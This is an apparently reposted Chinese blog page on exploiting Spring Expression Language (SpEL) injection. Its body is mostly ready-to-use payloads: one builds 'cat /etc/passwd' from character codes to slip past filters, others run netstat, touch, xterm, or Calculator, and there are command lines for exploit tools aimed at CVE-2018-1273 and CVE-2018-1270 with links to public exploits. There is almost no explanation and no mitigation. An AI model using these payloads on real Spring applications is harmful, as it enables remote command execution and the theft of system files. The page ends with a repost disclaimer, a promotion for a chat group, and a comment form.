Spring SPEL注入漏洞利用

SPEL 注入POC :

命令回显 poc:

T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())

${@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27netstat%20-na%27).getInputStream())}

..

命令执行 poc:

#{request.getClass().getClassLoader().loadClass("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec("touch/tmp/foobar")}

username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec(‘xterm’)")]=asdf

..

近期pivotal官方的漏洞利用,如下:

漏洞编号 : cve-2018-1273

漏洞环境 :

/Users/***/soft/vulapp/spring-data-examples/web/projection/target

漏洞利用 :

package com.evil.exp   SpringDataCommonsRCE

args -u http://127.0.0.1:8080/ -cmd ls

Spring SPEL注入漏洞利用

漏洞来源 :

https://pivotal.io/security/cve-2018-1273

漏洞编号 :cve-2018-1273

漏洞环境 :

/Users/***/javaweb/spring-boot-2.0.0.M2/spring-boot-samples/spring-boot-sample-data-rest/target

漏洞利用 :

package com.evil.exp   SpringDataRestRCE

args -u lshttp://127.0.0.1:8080/api/cities/1-cmd ls

Spring SPEL注入漏洞利用

漏洞编号 :cve-2018-1273

漏洞环境 :

/Users/***/javaweb/gs-messaging-stomp-websocket/complete/target

漏洞利用 :

package com.evil.exp  SpringMessagingRCE

ws://127.0.0.1:8080/hello /topic/greetings /Applications/Calculator.app/Contents/MacOS/Calculator

Spring SPEL注入漏洞利用

参考:
https://github.com/genxor/CVE-2018-1270_EXP
https://www.exploit-db.com/exploits/44289/

原文 

https://www.secpulse.com/archives/72661.html

本站部分文章源于互联网,本着传播知识、有益学习和研究的目的进行的转载,为网友免费提供。如有著作权人或出版方提出异议,本站将立即删除。如果您对文章转载有任何疑问请告之我们,以便我们及时纠正。

PS:推荐一个微信公众号: askHarries 或者qq群:474807195,里面会分享一些资深架构师录制的视频录像:有Spring,MyBatis,Netty源码分析,高并发、高性能、分布式、微服务架构的原理,JVM性能优化这些成为架构师必备的知识体系。还能领取免费的学习资源,目前受益良多

转载请注明原文出处:Harries Blog™ » Spring SPEL注入漏洞利用

分享到:更多 ()

评论 0

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址